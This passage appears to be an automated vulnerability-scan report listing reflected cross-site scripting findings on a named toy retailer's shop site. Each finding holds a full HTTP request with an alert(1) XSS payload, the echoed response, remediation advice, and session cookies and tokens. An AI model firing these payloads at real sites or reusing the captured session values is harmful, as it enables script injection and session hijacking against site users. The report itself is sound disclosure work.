This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /brand/index.jsp?a0b95--><script>alert(1)</script>cbd1ff41310=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:07 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35911


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<!-- === Request Query String: a0b95--><script>alert(1)</script>cbd1ff41310=1 -->
...[SNIP]...

1.6. http://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92aee"-alert(1)-"f0867c1b267 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/index.jsp?92aee"-alert(1)-"f0867c1b267=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:07 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35879


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="92aee"-alert(1)-"f0867c1b267=1";
   </script>
...[SNIP]...

1.7. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /cart/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5088e"-alert(1)-"9c6b25295b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cart/index.jsp?5088e"-alert(1)-"9c6b25295b4=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:34 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38137


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="http://shop.mattel.com";
    ess['qs']="5088e"-alert(1)-"9c6b25295b4=1";
   </script>
...[SNIP]...

1.8. http://shop.mattel.com/cart/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /cart/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b30d3--><script>alert(1)</script>0933ae012e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /cart/index.jsp?b30d3--><script>alert(1)</script>0933ae012e0=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:35 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Language: es-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38759


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview
...[SNIP]...
<!-- === Request Query String: b30d3--><script>alert(1)</script>0933ae012e0=1 -->
...[SNIP]...

1.9. http://shop.mattel.com/category/index.jsp [categoryId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The value of the categoryId request parameter is copied into an HTML comment. The payload e6697--><script>alert(1)</script>c56b49c6298 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?categoryId=3718115e6697--><script>alert(1)</script>c56b49c6298 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:57 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:04 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31622


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<!-- === Request Query String: categoryId=3718115e6697--><script>alert(1)</script>c56b49c6298 -->
...[SNIP]...

1.10. http://shop.mattel.com/category/index.jsp [categoryId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fed3"-alert(1)-"651a9d93d41 was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/index.jsp?categoryId=37181155fed3"-alert(1)-"651a9d93d41 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:57 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:04 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31590


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="categoryId=37181155fed3"-alert(1)-"651a9d93d41";
   </script>
...[SNIP]...

1.11. http://shop.mattel.com/category/index.jsp [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f001c"-alert(1)-"119cc5f951e was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=3741284f001c"-alert(1)-"119cc5f951e HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:12 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:19 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31742


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...

   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&categoryId=3741284f001c"-alert(1)-"119cc5f951e";
   </script>
...[SNIP]...

1.12. http://shop.mattel.com/category/index.jsp [jsessionid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The value of the jsessionid request parameter is copied into an HTML comment. The payload 68cfa--><script>alert(1)</script>ace09a66a83 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=374128468cfa--><script>alert(1)</script>ace09a66a83 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:15:13 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31774


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&categoryId=374128468cfa--><script>alert(1)</script>ace09a66a83 -->
...[SNIP]...

1.13. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57ab2"-alert(1)-"a83d7d56bb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /category/index.jsp?57ab2"-alert(1)-"a83d7d56bb0=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:52 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:28:59 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35909


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
           ess['locale']="en_US";
   
   
       ess['server']="http://shop.mattel.com";
    ess['qs']="57ab2"-alert(1)-"a83d7d56bb0=1";
   </script>
...[SNIP]...

1.14. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /category/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d0648--><script>alert(1)</script>18bef240369 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /category/index.jsp?d0648--><script>alert(1)</script>18bef240369=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:53 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:29:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 35941


                                                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht
...[SNIP]...
<!-- === Request Query String: d0648--><script>alert(1)</script>18bef240369=1 -->
...[SNIP]...

1.15. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 62aed--><script>alert(1)</script>19aa858cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

